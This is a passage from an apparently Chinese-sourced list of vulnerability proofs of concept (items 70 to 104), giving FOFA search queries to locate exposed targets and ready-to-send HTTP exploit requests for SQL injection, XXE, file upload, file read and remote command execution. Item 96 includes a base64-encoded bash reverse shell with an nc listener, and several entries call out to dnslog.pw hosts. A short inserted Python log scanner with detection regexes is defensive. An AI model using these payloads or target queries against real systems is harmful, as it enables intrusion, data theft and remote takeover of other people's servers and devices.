User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

70. 万户ezEIP success command execution
FOFA:app="万户网络-ezEIP"
POST /member/success.aspx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
Content-Type: application/x-www-form-urlencoded
TYPE: C
Content-Length: 16702

__VIEWSTATE=PAYLOAD

71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL injection
FOFA:body="PM2项目管理系统BS版增强工具.zip"
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1

72. 致远OA getAjaxDataServlet XXE
FOFA:app="致远互联-OA"
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
Host: 192.168.40.131:8099
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 583
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E

73. GeoServer wms remote code execution
FOFA:icon_hash="97540678"
POST /geoserver/wms HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Content-Length: 1981
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/xml
SL-CE-SUID: 3

PAYLOAD

74. 致远M3-server 6_1sp1 deserialization RCE
FOFA:title="M3-Server"
PAYLOAD

75. Telesquare TLR-2005Ksh router admin.cgi RCE
FOFA:app="TELESQUARE-TLR-2005KSH"
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /cgi-bin/test28256.txt HTTP/1.1
Host: x.x.x.x

76. 新开普掌上校园服务管理平台 service.action remote command execution
FOFA:title="掌上校园服务管理平台"
POST /service_transport/service.action HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 211
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
Upgrade-Insecure-Requests: 1

{
"command": "GetFZinfo",
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"
}

Then request:

GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
Host: x.x.x.x

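The SQL injection, file read, command execution and template injection entries in this list share a small set of request-level indicators: MSSQL time delays and UNION selects, "../" traversal (including the "..;/" variant), a shell metacharacter followed by a command inside a parameter value, and FreeMarker's Execute builtin. As an added example that is not part of the original article, here is a Python scanner that normalizes request text the way the server would (percent-decoding, lower-casing) and flags those indicators in log lines; the log lines, the indicator table and the "body=" suffix used to carry a request body are all constructed for this example, not a real log format.

```python
import re
from urllib.parse import unquote_plus

# Indicator table (constructed for this example): category -> regex applied to the
# normalized request text. Patterns follow the PoCs in this list.
INDICATORS = [
    ("sqli-time-based", re.compile(r"waitfor\s+delay\s+'\d+:\d+:\d+'")),
    ("sqli-union", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("sqli-mssql-fn", re.compile(r"@@version|hashbytes\(|fn_varbintohexstr|fn_sqlvarbasetostr")),
    ("path-traversal", re.compile(r"\.\./|\.\.\\|/\.\.;/")),
    # a value delimiter, then a pipe, backtick, newline or ';', then a common command name
    ("cmd-injection", re.compile(
        r"""[="'(]\s*(?:\|\|?|`|\n|;)\s*(?:id|whoami|ifconfig|ipconfig|cat|echo|ls|uname|curl|wget)\b""")),
    ("freemarker-ssti", re.compile(r"<#assign\s+\w+\s*=.*\?new\(\)")),
]


def normalize(request_text: str) -> str:
    """Percent-decode twice (catches %2527-style double encoding) and lower-case."""
    return unquote_plus(unquote_plus(request_text)).lower()


def scan(lines):
    """Return [(line_number, category), ...] for every indicator hit, in line order."""
    hits = []
    for number, line in enumerate(lines, 1):
        text = normalize(line)
        for category, pattern in INDICATORS:
            if pattern.search(text):
                hits.append((number, category))
    return hits


# Constructed access-log lines; the two POST lines carry their body as "body=..." so the
# scanner has something to inspect (a real setup would take bodies from a WAF or proxy log).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jun/2024:10:00:01 +0800] "GET /index.html HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jun/2024:10:00:02 +0800] "GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1" 500 0',
    '10.0.0.7 - - [01/Jun/2024:10:00:03 +0800] "GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 44',
    '10.0.0.9 - - [01/Jun/2024:10:00:04 +0800] "POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1" 200 913 body="path=..%2Fconfig.ini&filename=1&action=download"',
    '10.0.0.9 - - [01/Jun/2024:10:00:05 +0800] "GET /goform/webRead/open/?path=|id HTTP/1.1" 200 71',
    '10.0.0.9 - - [01/Jun/2024:10:00:06 +0800] "POST /service_transport/service.action HTTP/1.1" 200 12 body=<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}',
    '10.0.0.5 - - [01/Jun/2024:10:00:07 +0800] "GET /static/app.js?v=2024.06 HTTP/1.1" 200 8812',
]


if __name__ == "__main__":
    for number, category in scan(SAMPLE_LOG):
        print(f"line {number}: {category}")
```

Normalizing before matching is the important design choice: the PoCs above encode quotes, spaces and slashes, and a pattern applied to the raw line would miss them. The command-injection pattern deliberately requires a delimiter before the metacharacter, so an ordinary parameter such as command=ping in the tosei entry is not flagged on its own.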
77. F22服装管理软件系统 UploadHandler.ashx arbitrary file upload
FOFA:body="F22WEB登陆"
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Connection: close
Content-Length: 433
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix

------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="folder"

/upload/udplog
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Filedata"; filename="1.aspx"
Content-Type: application/octet-stream

hello1234567
------------398jnjVTTlDVXHlE7yYnfwBoix
Content-Disposition: form-data; name="Upload"

Submit Query
------------398jnjVTTlDVXHlE7yYnfwBoix--

78. pkpmbs 建设工程质量监督系统 FileUpload.ashx file upload
FOFA:icon_hash="2001627082"
POST /Platform/System/FileUpload.ashx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 336
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l

------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
Content-Type: image/png

YsOxWxSvj1KyZow1PTsh98fdu6l
------YsOxWxSvj1KyZow1PTsh98fdu6l
Content-Disposition: form-data; name="target"

/Applications/SkillDevelopAndEHS/
------YsOxWxSvj1KyZow1PTsh98fdu6l--

GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
Host: x.x.x.x

79. BYTEVALUE 百为流控路由器 remote command execution
FOFA:BYTEVALUE 智能流控路由器
GET /goform/webRead/open/?path=|id HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

80. 速达天耀软件 DesignReportSave.jsp arbitrary file upload
FOFA:app="速达软件-公司产品"
POST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 27
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/octet-stream
Upgrade-Insecure-Requests: 1

<% out.print("oessqeonylzaf");%>

Then request:

GET /xykqmfxpoas.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

81. 宇视科技 (Uniview) video surveillance main-cgi password disclosure
FOFA:app="uniview-视频监控"
GET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b remote command execution
FOFA:app="思福迪-LOGBASE"
POST /bhost/test_qrcode_b HTTP/1.1
Host: BaseURL
User-Agent: Go-http-client/1.1
Content-Length: 23
Accept-Encoding: gzip
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: BaseURL

z1=1&z2="|id;"&z3=bhost

83. JeecgBoot testConnection remote command execution
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jmreport/testConnection HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 8881
Accept-Encoding: gzip
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
Content-Type: application/json

PAYLOAD

84. Jeecg-Boot JimuReport queryFieldBySql template injection
FOFA:title=="JeecgBoot 企业级低代码平台"

POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: curl/7.88.1
Content-Length: 156
Accept: */*
Connection: close
Content-Type: application/json
Accept-Encoding: gzip

{
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",
"type": "0"
}

85. SysAid On-premise < 23.3.36 remote code execution
CVE-2023-47246
FOFA:body="sysaid-logo-dark-green.png"
The exploit request is as follows; it plants a Godzilla (哥斯拉) webshell
POST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/octet-stream
Accept-Encoding: gzip

PAYLOAD

Resulting URL: http://x.x.x.x/userfiles/index.jsp

86. Japanese tosei self-service laundry machine RCE
FOFA:body="tosei_login_check.php"
POST /cgi-bin/network_test.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 44
Accept: */*
Accept-Encoding: gzip
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

host=%0acat${IFS}/etc/passwd%0a&command=ping

87. 安恒明御安全网关 aaa_local_web_preview file upload
FOFA:title="明御安全网关"
POST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
Host: X.X.X.X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 198
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd

--qqobiandqgawlxodfiisporjwravxtvd
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"
Content-Type: text/plain

2ZqGNnsjzzU2GBBPyd8AIA7QlDq
--qqobiandqgawlxodfiisporjwravxtvd--

/jfhatuwe.php

88. 安恒明御安全网关 aaa_portal_auth_config_reset remote command execution
FOFA:title="明御安全网关"
GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

/astdfkhl.php

89. 致远互联FE协作办公平台 editflow_manager SQL injection
FOFA:title="FE协作办公平台" || body="li_plugins_download"
POST /sysform/003/editflow_manager.js%70 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 41
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

option=2&GUID=-1'+union+select+111*222--+

90. 海康威视IP网络对讲广播系统 3.0.3_20201113_RELEASE remote command execution
FOFA:icon_hash="-1830859634"
POST /php/ping.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Content-Length: 51
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest

jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig

91. 海康威视综合安防管理平台 orgManage/v1/orgs/download arbitrary file read
FOFA:title="综合安防管理平台"
GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

92. 海康威视运行管理中心 session command execution
Fastjson command execution
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"
POST /center/api/session HTTP/1.1
Host:
Accept: application/json, text/plain, */*
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json;charset=UTF-8
X-Language-Type: zh_CN
Testcmd: echo test
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 5778

PAYLOAD

93. 奇安信网神SecGate3600防火墙 app_av_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

Then request:

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. QiAnXin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"

98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (盈可视) HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the XML document below:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
